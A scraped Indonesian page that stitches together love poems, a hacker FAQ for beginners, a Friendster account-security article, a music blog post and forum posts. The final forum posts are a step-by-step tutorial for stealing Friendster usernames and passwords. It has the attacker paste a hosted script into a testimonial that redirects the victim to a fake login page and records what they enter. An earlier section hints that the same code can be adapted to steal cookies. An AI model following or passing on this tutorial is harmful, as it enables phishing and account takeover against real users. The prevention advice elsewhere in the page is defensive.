Aku tercipta di sela langit...
Meski tak sebiru siang permadaniku..
Selayaknya tak gelap mata memandang..
Memberi warna dalam kehidupan..
Aku tercipta dari kehinaan...
Meski tak seindah kata pujangga..
Sekiranya cinta jadi cahaya di hati..
Akulah rembulan purnama..
Berharap siang menjadi malam..
Akulah pencinta yang hina..
Berharap mencinta di dalam kelam...
Mengisi ruang dalam waktu yang gelap...
Bersama bintang yang kian bersinar..
Laksana hati ini yang berkilau..
Hanyalah bagi dia yang membutuhkan
Hanya Kamu..
di hati mu hanya ada aku
bila di benakmu hanya ada impian tentang aku
bahagianya aku...
ada senyum yang selalu menghias bibir merahmu
ada binar manja di matamu, memujaku
ada rindu yang selalu kau sampaikan
pada malam di peraduan tidurku
indah nya hariku memiliki mu...
kau yang selalu ada,
katakan lah cinta itu selalu milikku
katakan lah di hatimu hanya ada namaku
tanpa pernah kau bagi,
sayang,
miliki aku dengan cinta mu
selamanya....
ika aku jadi air mata....
aku akan menempel di pipimu...
ku temani kau saat sedih...
aku tak mau jatuh ke bumi...
aku akn jadi bagian terpenting dalam hidupmu
tapi jika kau jadi air mata...
tak kan ku biarkan mata ini menangis...
karena aku tak mau kehilangan dirimu...
tak kan ku biarkan kau pergi dari hidupku...
kau adalah segalanya....
Puisi cinta dari : hery_ dikirim pada tanggal 07 Feb 2009 to edit.
rASa ini.....Puisi cinta dari tunggadewi eMBun pAgi bASaHi jiWaQ.........
KicAU BuruNg pAgi iNi dAMaikAN HaTiQ YanG LarA........
TapI,,,,,,,,,,,
AdA yG bERBedA PagI iNi
iNdAH PagI iNi tAK SemPUrNA sePeRti bIasANya,,,
tAK sEIndAH kEtIKa Qt mASih BeRsaMA DulU,,,
KeSEpiAN Yg sELalU MenGhaNtui LanGkAhQ
tAk kunJuNg sIrnA........
MunGKin..........
kAreNa aWan BiruQ TertUtUp mENDUng hITAM kELAm......
hINGga mEMbUAt pAgI iNi tAK sEmpUrna...
Puisi cinta dari : tunggadewi dikirim pada tanggal 08 Feb 2009
Seputar HACKING & CRACKING
ECHO-ZINE RELEASE
08
Author: y3dips || [email protected]
Online @ www.echo.or.id :: http://ezine.echo.or.id
==== F.A.Q for NEWBIES Version 1.0 ===
Intr0
-----
Tulisan ini aku buat karena aku menyadari susahnya menjadi newbie , newbie yang
nanya kesana kemari dengan harapan dapet jawaban yang jelas, tetapi malah di
kerjain, di isengin bahkan di boongin, lebih parahnya lagi kalo cuma di ajarin
cara instan, trust me ? bisa deface 1,2, 4, ... 1000 sites tidak menjadikan
kamu hacker !!! pengen terkenal ? yupe kamu berhasil !! (mohon maaf juga , jika
semua yang baca bilang kalo aku munafik,aku akuin kl aku juga pernah mendeface
,but tidak ada kata terlambat untuk menyadarinya )
Stop! jangan salah menyangka dan menuduh kalo aku sudah lebih hebat dari teman2,
dan merasa sok hebat untuk meng-gurui teman2, TIDAK! ini hanyalah apresiasi
terhadap usaha teman-teman yang mau belajar dan terus terang artikel inipun
secaragaris besar meniru artikel "HOW TO BECOME A HACKER" oleh kang "eric S R "
dan telah menyalin ulang beberapa poin penting dari artikel berlicensi GPL tsb.
Artikel inipun telah di bubuhi tambalan2 dari beberapa pertanyaan yang sering
di temui. Adapun yang aku coba lakukan adalah hanya coba mendokumentasikannya
disini dengan harapan jika ada yang memerlukannya dapat dengan mudah me-refer
ke artikel ini.
Soal Version 1.0 , aku sengaja menambahkan versi agar artikel ini tidak baku,
artinya bisa di perbaiki , dihapus, di edit, di sempurnakan sesuai dengan
masukan dari semua teman2 dan perkembangan yang terjadi nantinya .
[F.A.Q]
[0] T : Tolong Jelaskan Apa Itu HAcker ?
J : Hacker adalah: Seseorang yang tertarik untuk mengetahui secara mendalam
mengenai kerja suatu system, komputer, atau jaringan komputer."
[1] T : Maukah Anda mengajari saya cara hacking?
J : Hacking adalah sikap dan kemampuan yang pada dasarnya harus dipelajari sendiri.
Anda akan menyadari bahwa meskipun para hacker sejati bersedia membantu,
mereka tidak akan menghargai Anda jika Anda minta disuapi segala hal yang
mereka ketahui
Pelajari dulu sedikit hal. Tunjukkan bahwa Anda telah berusaha, bahwa Anda
mampu belajar mandiri. Barulah ajukan pertanyaan-pertanyaan spesifik pada
hacker yang Anda jumpai.
Jika toh Anda mengirim email pada seorang hacker untuk meminta nasihat,
ketahuilah dahulu dua hal. Pertama, kami telah menemukan bahwa orang-orang
yang malas dan sembrono dalam menulis biasanya terlalu malas dan sembrono
dalam berpikir sehingga tidak cocok menjadi hacker -- karena itu usahakanlah
mengeja dengan benar, dan gunakan tata bahasa dan tanda baca yang baik,
atau Anda tidak akan diacuhkan.
Kedua, jangan berani-berani meminta agar jawaban dikirim ke alamat email
lain yang berbeda dari alamat tempat Anda mengirim email; kami menemukan
orang-orang ini biasanya pencuri yang memakai account curian, dan kami
tidak berminat menghargai pencuri
T : Kalau begitu arahkan saya?
J : Baiklah , kamu harus belajar !!
T : Apa yang harus di pelajari ?
J : Networking (jaringan) , Programing , Sistem Operasi , Internet
T : wow, apa gak terlalu banyak tuh ?
J : Tidak, Semua itu tidak harus kamu kuasai dalam waktu cepat, basicnya yang penting
Ingat semua itu perlu proses!
T : Networking saya mulai dari mana ?
J : Pengetahuan dasar jaringan ( konsep TCP/IP) , komponen dasar jaringan, topologi
jaringan, terlalu banyak artikel yang dapat kamu baca dan buku yang bertebaran
di toko toko buku, atau kamu bisa mencoba berkunjung kesitus ilmukomputer.com
T : Untuk programing ?
J : Mungkin yang terpenting adalah 'logika' pemrograman , jadi lebih kearah
pemanfaatan logika , ada baiknya belajar algoritma , pengenalan flowchart
atau bagan alur untuk melatih logika (teoritis) serta untuk prakteknya sangat
disarankan belajar pemrograman yang masih menomer satukan logika/murni
T : Kalau begitu bahasa pemrograman apa yang harus saya pelajari awalnya?
J : Bahasa Pemrograman apapun sebenarnya sama baik, tetapi ada baiknya belajar
bahasa seperti C , Perl , Phyton, Pascal, C++ , bukan berarti
menjelek-jelekkan visual programing ( nanti kamu akan tau bedanya )
(*ini murni pengalaman pribadi)
[3] T : Bagaimana saya harus memulai programing ?
J : Kumpulkan semua dokumentasi, manual, how to , FAQ , buku , dan contoh contoh
dari bahasa pemrograman yang akan anda pelajari , Cari dan install software
yang dibutuhkan oleh bahasa tersebut (Sesuai dokumentasi) , cobalah memprogram
walaupun program yang simple, dan kamu tidak di "haramkan" untuk mengetik ulang
program contoh dengan harapan kamu akan lebih mengerti dibandingkan kamu hanya
membaca saja, cari guru, teman atau komunitas yang bisa diajak bekerja sama
dalam mempelajari bahasa tersebut ( gabung dimilis, forum khusus bahasa tsb )
, sisanya tergantung seberapa besar usaha kamu. jangan mudah menyerah apalagi
sampai putus asa.
[1] T : Apakah Visual Basic atau Delphi bahasa permulaan yang bagus?
J : Tidak, karena mereka tidak portabel. Belum ada implementasi open-source dari
bahasa-bahasa ini, jadi Anda akan terkurung di platform yang dipilih oleh vendor.
Menerima situasi monopoli seperti itu bukanlah cara hacker.
[1] T : Apakah matematika saya harus bagus untuk menjadi hacker?
J : Tidak. Meskipun Anda perlu dapat berpikir logis dan mengikuti rantai pemikiran
eksak, hacking hanya menggunakan sedikit sekali matematika formal atau aritmetika.
Anda terutama tidak perlu kalkulus atau analisis (kita serahkan itu kepada para
insinyur elektro :-)). Sejumlah dasar di matematika finit (termasuk aljabar Bool,
teori himpunan hingga, kombinasi, dan teori graph) berguna.
T : Tentang pemrograman Web , apakah harus ?
J : Yupe, dikarenakan Internet adalah dunia kamu nantinya
T : Bahasa pemrograman web apa yang sebaiknya dipelajari untuk pemula ?
J : Mungkin kamu bisa mencoba HTML, dilanjutkan ke PHP yang akan membuat kamu lebih
familiar ke programing secara penuh
T : Tentang Sistem Operasi , kenapa harus ?
J : Penguasaan terhadap suatu operating system adalah sangat penting, kenapa ?
karena itulah lingkungan kamu nantinya , perdalami cara kerja suatu operating
system , kenali dan akrabkan diri :)
T : Sebaiknya, Operating system apa yang saya perdalami?
J : mungkin kamu bisa coba linux atau BSD , selain mereka free , dukungan komunitas
juga sangat banyak sehingga kamu tidak akan di tinggal sendirian jika menemukan
masalah, dan pula kemungkinan kamu untuk dapat berkembang sangatlah besar
dikarenakan sifat "open source"
T : Untuk pemula seperti saya , apa yang harus saya gunakan ?
J : Sebaiknya jika kamu benar benar pemula, kamu bisa gunakan linux , karena baik
sistem installasinya dan Graphical User Interfacenya lebih memudahkan kamu
T : Distro apa yang sebaiknya saya gunakan dan mudah untuk pemula
J : Kamu bisa mencoba Mandrake (disarankan oleh beberapa ahli yang pernah diajak
diskusi) , tetapi kamu bisa memilih sesukamu, meskipun aku memulainya juga
dengan mandrake tetapi aku lebih comfort dengan redhat.
T : Kalau tidak bisa Menginstall linux apakah jalan saya sudah tertutup?
J : Kamu bisa mencoba menginstall vmware , cygwin atau kamu bisa menyewa shell
T : Dimana Saya bisa mendapatkan programn program tersebut
J : berhentilah bertanya , dan arahkan browser kamu ke search engine , terlalu
banyak situs penyedia jasa yang dapat membantu kamu
T : Apakah saya HArus memiliki komputer ?
Y : IYA! , kecuali kalo kamu sudah dapat berinteraksi lebih lama dengan komputer
meskipun itu bukan milik kamu, tetapi sangat baik jika memilikinya sendiri
karena , pertama : Ide yang timbul bisa setiap saat, baik programing, riset
dsb, jadi ada baiknya kamu memilikinya agar dapat langsung
menyalurkan semua ide dan pemikiran kamu
Kedua : menggunakan PC sendiri membuat kamu merasa bebas untuk
bereksplorasi dan mencoba tanpa takut merusak dsb
T : Hardware apa yang saya butuhkan ?
Y : Menginggat harga komputer sudah relatif "murah" (mohon maaf buat yang masih belum
mampu membelinya) , kamu bisa sesuaikan spesifikasinya untuk kamu gunakan
T : Internet , apakah saya harus terkoneksi ke internet?
Y : Terkadang itu perlu, tetapi jangan terlalu memaksakan , kamu memang perlu terhubung
ke internet untuk mendownload modul, bacaan, update informasi, tetapi jangan jadikan
penghalang jika kamu tidak bisa terkoneksi secara periodik, jadilah kreatif
[1] T : Berapa lama waktu yang saya butuhkan?
J : Masalah waktu itu relatif, Bergantung seberapa besar bakat dan usaha Anda.
Kebanyakan orang memperoleh keahlian yang cukup dalam delapan belas bulan
atau dua tahun, jika mereka berkonsentrasi. Tapi jangan pikir setelah itu
selesai; jika Anda hacker sejati, Anda akan menghabiskan sisa waktu belajar
dan menyempurnakan keahlian.
T : Apakah tidak bisa yang Instan ? misal Tinggal gunain tool tertentu ?
J : Hum, kamu mo jadi hacker atau cuma pemakai tools ?, kalau menggunakan tools
semua orang juga bisa!!
[1] T : Bagaimana cara mendapatkan password account orang lain?
J : Ini cracking. Pergi sana, bodoh.
[1] T : Bagaimana cara menembus/membaca/memonitor email orang lain?
J : Ini cracking. Jauh-jauh sana, goblok
[0] T : Cracker ? apa itu ?
J : Cracker adalah individu yang mencoba masuk ke dalam suatu sistem komputer
tanpa ijin (authorisasi), individu ini biasanya berniat jahat/buruk, sebagai
kebalikan dari 'hacker', dan biasanya mencari keuntungan dalam memasuki suatu
sistem
[1] T : Saya dicrack. Maukah Anda menolong saya mencegah serangan berikutnya?
J : Tidak. Setiap kali saya ditanya pertanyaan di atas sejauh ini, ternyata
penanyanya seseorang yang menggunakan Microsoft Windows. Tidak mungkin secara
efektif melindungi sistem Windows dari serangan crack; kode dan arsitektur
Windows terlalu banyak mengandung cacat, sehingga berusaha mengamankan Windows
seperti berusaha menyelamatkan kapal yang bocor dengan saringan. Satu-satunya
cara pencegahan yang andal adalah berpindah ke Linux atau sistem operasi lain
yang setidaknya dirancang untuk keamanan.
T : Apakah saya perlu komunitas ?
J : YUPE , komunitas sangat kamu perlukan, apalagi jika kamu memilih untuk berkecimpung
di dunia opensource, banyak milis yang bisa kamu ikuti, sebaiknya ikuti milis yang
spesifik sesuai dengan yang kamu gunakan. (misal linux, sesuai distro )
T : Apakah termasuk milis sekuriti ?
J : iyah ! cobalah [email protected]
ReFerensi :
[0]. *RFC1392,Internet User Glossary
[1]. How to Become A Hacker - Eric S Raymond
Terjemahan Indonesia dari How To Become A Hacker - Steven Haryanto
[2]. Ezine at http://ezine.echo.or.id
[3]. Milis [email protected]
[4]. #e-c-h-o room @t DALNET
. Pendapat pribadi , hasil diskusi, MIlis lain , forum, Chatting
*
Menangkal Kejahatan Hacking Friendster 27
Di kalangan anak muda dan remaja situs jejaring sosial Friendster adalah yang paling banyak digemari, bahkan terbesar di wilayah asia. Banyak hal positif yang bisa di dapat dengan kehadiran Friendster. Bayangkan, Anda bisa berteman dengan siapa saja, baik yang berbeda daerah, berbeda suku, berbeda kepercayaan, berbeda status sosial, berbeda latar belakang pendidikan, berbeda pekerjaan, bahkan berbeda negara walaupun semuanya hanya di dunia maya.
Gratis dan mudah dalam penggunaannya adalah salah satu alasan mengapa situs jejaring sosial Friendster menjadi primadona. Disamping menjalin pertemanan dengan siapa saja, Friendster juga bagi sebagian orang dijadikan ajang untuk mencari pasangan alias pacar, bahkan tidak menutup kemungkinan bisa menjadi nyata di dunia maya. Ada yang berpendapat, bahwa di Friendster itu banyak tersimpan hal-hal yang ‘palsu’, maksudnya tidak semua informasi yang ada di profil Friendster itu asli, ada beberapa yang menuliskannya dengan aspal. Kita ambil contoh sederhana, mungkin kalau di kehidupan nyata orang tersebut berstatus nikah dengan dua orang anak, tapi kalau status di FS bisa saja dibuat menjadi single, bukan tidak mungkin hal demikian terjadi. Mungkin ada yang berpikiran “FS itu kan bukan tempat kredit motor, dimana pembelinya harus di survery terlebih dahulu” sebuah pemikiran yang masuk akal akan tetapi sebenarnya keliru.
Kalau kita persempit sebenarnya banyak penyimpangan-penyimpangan dari tujuan friendster itu sebenarnya. Hal tersebut biasanya dilakukan oleh oknum tertentu yang tidak bertanggung jawab. Bagi orang-orang yang dianggap penting kepemilikan Friendster tidak selamanya berdampak baik, justru bisa menjadi sandungan masalah yang besar. Percaya atau tidak ketika penulis melakukan search dengan kata kunci “SBY” maka akan ditemukan sekitar 30-35 account yang mirip dengan menggunakan nama presiden kita, yaitu Bapak Susilo Bambang Yudhoyono(SBY). Foto yang ditampilkannya juga cukup beragam, ada foto resmi presiden yang biasa kita lihat terpajang di sekolah atau kantor, foto presiden mengenakan atribut militer, foto presiden sedang tersenyum dengan latar belakang bendera merah putih dan masih banyak lagi. Nama account yang digunakan juga beragam, ada yang namanya SBY Alinskie, SBY bhayangkara, dan juga beberapa nama lain yang unik. Ada beberapa profil friendster SBY palsu ini memiliki banyak teman dan beberapa testimonial, hal yang disampaikan juga beragam mulai dari dukungan, keluhan dan saran. Percaya atau tidak Anda bisa membuktinya sendiri, kalau perlu mungkin Anda bisa menanyakannya kepada beliau ^ ^, tetapi yang jelas presiden kita tentunya akan lebih memikirkan pemerintahan dan nasib rakyatnya yang sedang ‘meradang’ BBM daripada harus mengurusi testimonial dan mencari teman di dunia maya. Bukankah begitu?
Dari contoh kasus di atas bisa kita tarik kesimpulan, bahwa FS yang bertujuan baik untuk menjaring pertemanan justru dijadikan hal yang tidak baik untuk orang yang tidak bertanggung jawab. Bayangkan jika profil Friendster milik pak SBY palsu tersebut berisi penghinaan, hasutan atau mungkin foto beliau yang tidak senonoh, wah bisa gawat urusannya kan?
Ada sebuah cerita yang menarik dari salah seorang teman penulis, kebetulan dia bekerja di sebuah perusahaan asuransi di Jakarta. Kegiatan chatting dan mengecek Friendster biasa ia lakukan di waktu luang kerjanya, terkadang saat kerja pun dia bisa-bisanya mencuri waktu untuk chatting(dasar temanku ini^^). Pada waktu itu, dia sengaja datang agak pagi sebab akan banyak memiliki waktu untuk browsing dan mengecek FS-nya, betapa terkejutnya ketika dia menyaksikan tampilan profil friendsternya sudah berubah, mulai dari keterangan yang ditampilkan sampai foto profilnya. Celakanya, ketika dia hendak mengubahnya kembali hal tersebut tidak bisa dilakukan dan yang muncul hanyalah peringatan “invalid password”. Tentu saja teman saya menjadi geram, sebab dia tidak pernah merasa mengubah profil dan mengubah passwordnya. Dia baru menyadari bahwa satu hari sebelumnya telah mengakses FS dari warnet dan lupa melakukan logout. Jika demikian, maka teman penulis sudah mengalami yang nama hacking friendster, yang disebabkan karena keteledorannya.
Memahami Hacking Friendster
Hacking friendster berbeda dengan hacking pada sebuah website, hacking friendster lebih memanfaatkan kecerobohan para penggunanya dibandingkan exploitasinya. Dalam hal ini belum ditemukan adanya kasus website utama friendster di hack(tolong kasih feedback kalau salah), tetapi kalau account friendster tentu sudah banyak.
Banyak alasan yang menyebabkan terjadinya hacking friendster, diantaranya:
Perbuatan iseng
Untuk alasan yang satu ini biasanya dilakukan oleh orang-orang yang hanya ingin melakukannya untuk kesenangan dirinya dan menganggapnya sebagai sesuatu yang biasa, padahal korbannya akan dirugikan.
Mencoba jebakan
Untuk alasan ini biasanya hanya dilakukan untuk menguji coba jebkan yang dibuat, biasanya menggunakan halaman login friendster yang palsu atau dengan mengirim testimonial. Tetapi tidak melakukan hal yang merugikan.
Tindak kejahatan
Kalau untuk yang satu ini memang sengaja dilakukan untuk hal yang tidak baik, misalnya mengubah informasi pada halaman profil yang tidak semestinya atau mengubah foto profil dengan foto yang tidak sesuai. Hal tersebut biasanya dilakukan untuk ‘menjatuhkan’ orang tersebut dan adanya perasaan dendam, Untuk melakukan hal tersebut biasanya dengan melakukan pencurian account dan mengubahnya dengan account berbeda, contohnya password yang sudah diubah.
Dengan melihat fakta tersebut hendaknya kita waspada dan berhati-hati agar tidak terjadi yang namanya hacking friendster.
Metode Hacking Friendster
Sebuah account friendster bisa dijebol dengan berbagai metode, dari cara yang termudah sampai dengan cara tersulit. Semuanya memanfaatkan kelemahan dari pemilik account FS tersebut.
Beberapa metode hacking friendster yang biasa dilakukan, diantaranya:
Dengan menggunakan testimonial cara 1, dengan cara seperti ini si pelaku biasanya akan mengirim sebuah testi yang didalamnya telah dibumbui(emanya sayur bang ^^) skrip tertentu. Untuk mengelabuhinya, testi tersebut sengaja tidak dibuat dalam bentuk teks tetapi bisa dalam bentuk animasi flash. Pada testi tentunya yang akan terlihat hanyalah animasi menarik, tetapi ketika di klik maka si korban akan diarahkan pada halaman login palsu, yang menyatakan bahwa ia belum login, padahal tanpa sadar ia sudah memasukan username dan password ke tempat yang salah. Cara ini berlaku jika si korban mengeset penerimaan testimonialnya secara langsung.
Dengan menggunakan testimonial cara 2,, cara yang digunakan sebenarnya sama, tetapi cara kedua ini biasanya dilakukan jika si korban mengeset penerimaan testimonial tidak secara otomatis. Cara kerjanya, si pelaku akan mengirim testimonial untuk di approve, ketika si korban sudah meng-approvenya maka akan diarahkan pada halaman login palsu, sesudah itu kena dech.
Dengan MediaBox, cara kerjanya sama yaitu dengan menggunakan redirect URL. Letak perbedaanya, si pelaku sengaja memasang jebakannya pada mediabox profilnya, ketika korban mengunjungi halaman profile si pelaku maka akan diarahkan pada halaman login palsu, jadinya kena hack lagi dech.
Social Engineering, untuk cara yang satu ini berbeda dengan ketiga cara di atas. Social engineering menggunakan metode pengamatan dan penganalisaan dari isi profil yang ditampilkan, hal utama yang perlu diketahui adalah alamat email si korban. Setelah si pelaku mempelajari profil korban maka langkah selanjutnya adalah mencoba untuk login dengan menggunakan email si korban, untuk password akan mencoba segala kemungkinan yang cocok dengan profil friendster, seperti tanggal lahir, nama pacar, nama makanan kesukaan, tempat sekolah dan lain sebagainya. Cara seperti ini memang memerlukan waktu yang lama tetapi mujarab lho.
Sebenarnya masih banyak cara yang bisa digunakan untuk melakukan friendster hacking, sebagai referensi mungkin Anda bisa juga membaca buku karangan Thor yang di terbitkan oleh Elexmedia Komputindo.
Cara Mencegah Hacking Friendster
Jika Anda belum menjadi korban hacking maka Anda bisa mengikuti kiat-kiat berikut, supaya tidak menjadi korban berikutnya(kayak pembunuhan saja ^^).
Cara mencegahnya sebagai berikut:
Jangan melakukan penerimaan testimonial secara otomatis, pada bagian Privacy Setting ubah pada bagian “Approve comments automatically:” menjadi Never.
Jangan mengapprove testimonial yang isinya dianggap mencurigakan.
Jika setelah meng-approve testi atau mengklik testimonial muncul halaman login friendster baru, segera tutup halaman login tersebut. Ingat! Jika Anda sudah bisa mengapprove testi itu tandanya Anda sudah login, jadi tidak mungkin dusuruh login lagi. Tandanya jika Anda sudah login halaman logout akan ditampilkan.
Pastikan alamat login yang benar adalah www.friendster.com/login.php. URL palsu tentunya tidak akan menggunakan nama yang sama, tetapi hanya menggunakan tampilan yang sama.
Hal yang sepele tapi penting jangan lupa setelah mengakses situs friendster untuk melakukan logout, agar Anda bisa keluar secara aman.
Jangan memberikan tanda ceklist pada opsi rememberme pada saat Anda login ke situs friendster, sebab browser akan mengingat dan menyimpannya seca otomatis.
Jangan mengumbar informasi terlalu penting pada halaman profile, sebab bisa dijadikan media social engginering untuk pencurian account Anda.
Buatlah password yang tidak mudah ditebak oleh orang lain, password tersebut tentunya jangan berhubungan dengan isi profil friendster Anda. Gunakan kombinasi hurup, angka, dan karakter khusus tetapi jangan sampai lupa mengingatnya.
Jika Anda menerapkan cara-cara di atas niscaya Anda tidak akan menjadi korban dari hacking friendster ^ ^.
Dengar Berbagai Lagu Online GRATIS
Setelah kita selalu membeli kaset, lalu merubah seluruh koleksi musik menjadi CD, dan akhirnya dirubah lagi menjadi MP3 di komputer, semua seperti tidak akan habis. Mp3 pun kalau ada standard yang lebih baik lagi harus kita rubah lagi. MP3 pun tidak selalu gratis dan harus didownload dahulu. Secara lingkungan, saya pernah menulis mengenai “Daripada Beli CD, Download Saja Melalui Internet, Asalkan Sah.” untuk mendownload lagu karena secara lingkungan akan lebih baik oleh karena jalur rantai distribusi dan produksi dari CD itu sendiri. Memang untuk semua aktivitas ini memerlukan bandwidth internet yang cukup besar, tetapi dengan pertumbuhan bandwidth internet yang semakin cepat, maka semakin banyak juga yang dapat menggunakan alternatif lagu melalui internet ini. Alternatif lain adalah mendengarkan radio secara online. Sekarang sudah ada banyak radio Indonesia pun memiliki alternatif radio online. Daftar radio Indonesia yang online bisa dilihat disini. Radio online bisa didengarkan melalui Winamp, i-tunes, Windows Media Player, ataupun lainnya. Dengan radio online ini pun komunitas Indonesia yang ada di luar negeri dapat terus mendengarkan berita maupun lagu dari Indonesia.
Tetapi kadang kita juga mau memilih sendiri lagu yang mau didengarkan dimana kalau kita mendengarkan radio, kecuali kita request, bisa mendengarkan lagu pilihan kita. Oleh karena itu ada juga cara baru memilih dan mendengarkan lagu melalui internet. Kalau dengan You Tube kita bisa melihat video gratis lewat internet, maka dengan Songza dan Songerize kita bisa mencari lagu yang kita inginkan dan langsung memutarnya melalui internet. Songerize saya rasa lebih lengkap karena coba-coba cari lagu Indonesia, walaupun tidak semua ada, masih bisa tercari. Cara penggunaan pun mudah sekali karena tidak memerlukan software tambahan, seperti juga You Tube.
Mudah-mudahan info ini bisa berguna.
Entry Filed under: TeknoHijau. .
ID & PASWORD FS ANDA
Dibawah ini adalah tutorial bagaimana seorang hacker bisa mendapat password dan id Anda dengan mudah. Bacalah dengan seksama. Moderator dan teman-teman Friendstertalk Indonesia akan membantu apabila Anda mengalami kesulitan. Hacking Friendster dengan menggunakan Overlay Profile. Ini adalah contoh sebagian code yang digunakan. Tanda biru adalah angka yang harus diganti dengan USER ID Anda.
Setelah tanda biru tersebut diganti dengan USER ID Anda. Lalu masukkan code tersebut disini.
Kemudian, masukkan code yang telah di compress pada website tersebut ke dalam media box profile Anda. Ok, profile Anda resmi profile hacker . Lihat gambar dibawah ini, apabila teman-teman Anda datang ke profile Anda, mereka akan menemukan page seperti ini.
Apabila Anda mengisi email dan password. Maka, Anda telah memberikan kedua hal tersebut, pada hacker tersebut. Page yang Anda isi adalah sending message style lewat php. Hacker akan mendapatkan kiriman message lewat URL yang telah mereka link ke dalam code hacking tersebut dalam bentuk txt file. Lihat gambar ini lebih lanjut.
Remember! Apabila Anda telah hinggap di profile yang Anda yakin ada code hacking yang tertanam, cobalah sebelum Anda log out, untuk mengganti password Anda. Pastikan semua profile yang telah Anda buka, ditutup, tanpa menyisakan satu profile pun. Dengan begitu, mungkin Anda telah selamat dari trap yang telah dibuat oleh sang hacker.
Hacking Friendster lewat TESTIMONIAL REDIRECT.
Anda akan diberi sang hacker testimonial, perkenalan, atau bahkan teman dekat Anda sendiri. Dalam hal ini, Anda akan dihadapkan pada testimonial yang membawa Anda pada halaman login.
Seperti ini :
Sama seperti yang diatas, Anda tidak perlu mengisi form login tersebut, karena halaman tersebut adalah tipuan. Anda sebaiknya menutup halaman tersebut dan men-pending testimonial yang dikirim.
Ini adalah code yang digunakan sang hacker pada testimonial yang mereka kirim:
Code:
hai .. kenalan donk. Kok ga bisa di add ya? <img id="XcodeCommunity" width="0"> Bagaimana? Anda harus hati-hati dengan Testimonial Redirect. Hal ini bisa berbahaya mengingat FRIENDSTER memakai Cookie yang tidak ada kadaluarsanya. Teknik ini bisa di-modifikasi untuk mendapatkan Cookies target.
Cara efektif:
Hapuslah cookies, saved password dan hal hal lainnya. Apabila Anda menggunakan Mozilla, tekanlah tools pada navigasi browser Anda. Lalu tekan CLEAR PRIVATE DATA. Berilah tanda pada semua kategori lalu delete. Apabila Anda menggunakan Internet Explorer, sebaiknya Anda menghapus semua history, karena ada code yang hacking yang sangat berbahaya, apalagi Anda menggunakan pelanggan Internet rumah. Sebaiknya, bersihkan semua data pada browser milik Anda.
Lakukan hal diatas sebelum Anda log out dari Friendster. (Tunggu postingan berikutnya)
Hacking password di friendster
Melakukan Hacking password di friendster
langkah-langkahnya :
1. Masuk ke testimonial teman anda / target anda.
2. Masukkan :
halo atau apa terserah asal ada tulisan (lalu klik kanan lalu paste source “A”, JANGAN di Ctrl V cara pastenya)
—- More —-
3. Lalu tunggu beberapa waktu sampai approve testimonialnya.
4. Setelah di approve maka anda dapat menunggu target atau para pengguna friendster membuka fs target dan tentu saja melakukan login di friendster target anda. ( Saat fs target terbuka maka dalam beberapa detik / waktu langsung berubah halaman menjadi halaman untuk login yang hasilnya akan direcord di KLIK Disini (http://www.yogyafree.net/) - Jalan di IE, tp ada browser yg ga bisa)
Source “A” : Klik Disini (http://www.yogyafree.net/familycode/source_a.txt)
Ok, met ngehack fs http://www.yogyafree.net/forum2/images/smiles/icon_wink.gif
Penulis :
^family_code^
berhubung banyaknya reply yg kebanyakan kecewa >:).
dan sesuai dengan tuntutan untuk dikasih contoh, maka gua coba beri sedikit sample walaupun ada kekurangannya. tapi setidaknya ada gambaran besar buat rekan-rekan semua.
LANGKAH 1.
bukalah IE di kompie anda
http://serv2.imagehigh.com/imgss/5465187_klik%20IE.jpg (http://serv2.imagehigh.com/view.php?id=5465187_klik%20IE.jpg&path=/imgss)
LANGKAH 2.
log in ke fs anda. dengan username dan password anda tentunya :)).
http://serv2.imagehigh.com/imgss/5465188_log%20in%20ke%20fs.jpg (http://serv2.imagehigh.com/view.php?id=5465188_log%20in%20ke%20fs.jpg&path=/imgss)
LANGKAH 3.
siapkan “SOURCE A” ini adalah script (senjata kamu untuk ngehack korban). caranya : setelah terbuka window “source a” - nya (berbentuk html) copy scriptnya semua (ingat, harus lengkap. jangan ada yg ketinggalan). cara copy ialah dengan mouse (jangan sekali-kali tangan anda pegang keyboard saat copy script. BAHAYA BISA MELEDAK >:)>:)).
http://serv2.imagehigh.com/imgss/5465189_source%20a.jpg (http://serv2.imagehigh.com/view.php?id=5465189_source%20a.jpg&path=/imgss)
ingat : lakukan copy dengan mouse. jangan pake ctrl +v. nanti ngga jalan.
LANGKAH 4.
setelah itu semua, barulah anda kirim “TESTI / COMMENT” ke target atau korban anda. caranya sangat mudah. cukup tulis / ketik “hi” atau “apa kabar” atau “hi. boleh kenalan nda”.
apa saja terserah anda yg penting ada tulisan. jangan sampe kosong, nanti korban “curigation” kok isinya kosong ;).
http://serv2.imagehigh.com/imgss/5465192_kirim%20comment%20atau%20testi.jpg (http://serv2.imagehigh.com/view.php?id=5465192_kirim%20comment%20atau%20testi .jpg&path=/imgss)
LANGKAH 5.
setelah anda menuliskan “sesuatu” untuk korban anda, barulah masukkan script “SOURCE A” tersebut di bawah isi pesan anda.
anggap lah setelah akhir tulisan, enter 1X / 2X yg jelas posisi script ada dibawah.
http://serv2.imagehigh.com/imgss/5465195_setelah%20paste.jpg (http://serv2.imagehigh.com/view.php?id=5465195_setelah%20paste.jpg&path=/imgss)
ada pertanyaan yg menarik seputar source a ini. ada yg bertanya. “maksimal kan 1000 karakter / huruf. gimana masukinnya. kalo ada memasukkan 1 bab puisi cinta shakespeare tentu ngga bakalan cukup.
berhubung ini adalah script. maka system tidak akan membacanya sebagai karakter, karena script ini lain karakter huruf :D.
lihat di gambar. setelah dilakukan paste, masih ada sekitar 938 karakter lagi untuk di ketik, padahal script sudah saya masukkan.:cool:.
setelah itu, kirim testi / comment ada ke korban >:).
nah yang harus anda lakukan adalah menunggu approval dari korban. kalo korban approve dengan testi / comment anda, eng…ing…eng…>:). maka anda berhasil mendapatkan username sama password korban. kalo tidak di approve, silahkan cari korban lain yg maunya approve terus :)).
catatan 1.
anda tidak akan mendapatkan username sama password dikirimkan ke email anda, atau ke balasan comment / testi anda (emang lo kira lo siapa :)). becanda :D. peace :p ). lihat point 4 diatas (bukan langkah 4 tapi point 4 ada tulisan direcord “klik disini”)
carilah username target anda bila ada, maka passwordnya berada disebelahnya. bila tidak ada, maka belum di approve.
http://serv2.imagehigh.com/imgss/5465198_list%20korban.jpg (http://serv2.imagehigh.com/view.php?id=5465198_list%20korban.jpg&path=/imgss)
catatan 2.
setelah anda mengirim script tersebut ke korban, maka setelah korban approve testi / comment anda, anda belum mendapatkan password ama usernamenya. anda akan mendapatkan password ama username setelah korban log in untuk kedua kalinya (log in pertama adalah saat dia approve comment / testi anda. log in kedua adalah setelah ia log out dari log in pertama… halah..:))).
catatan 3.
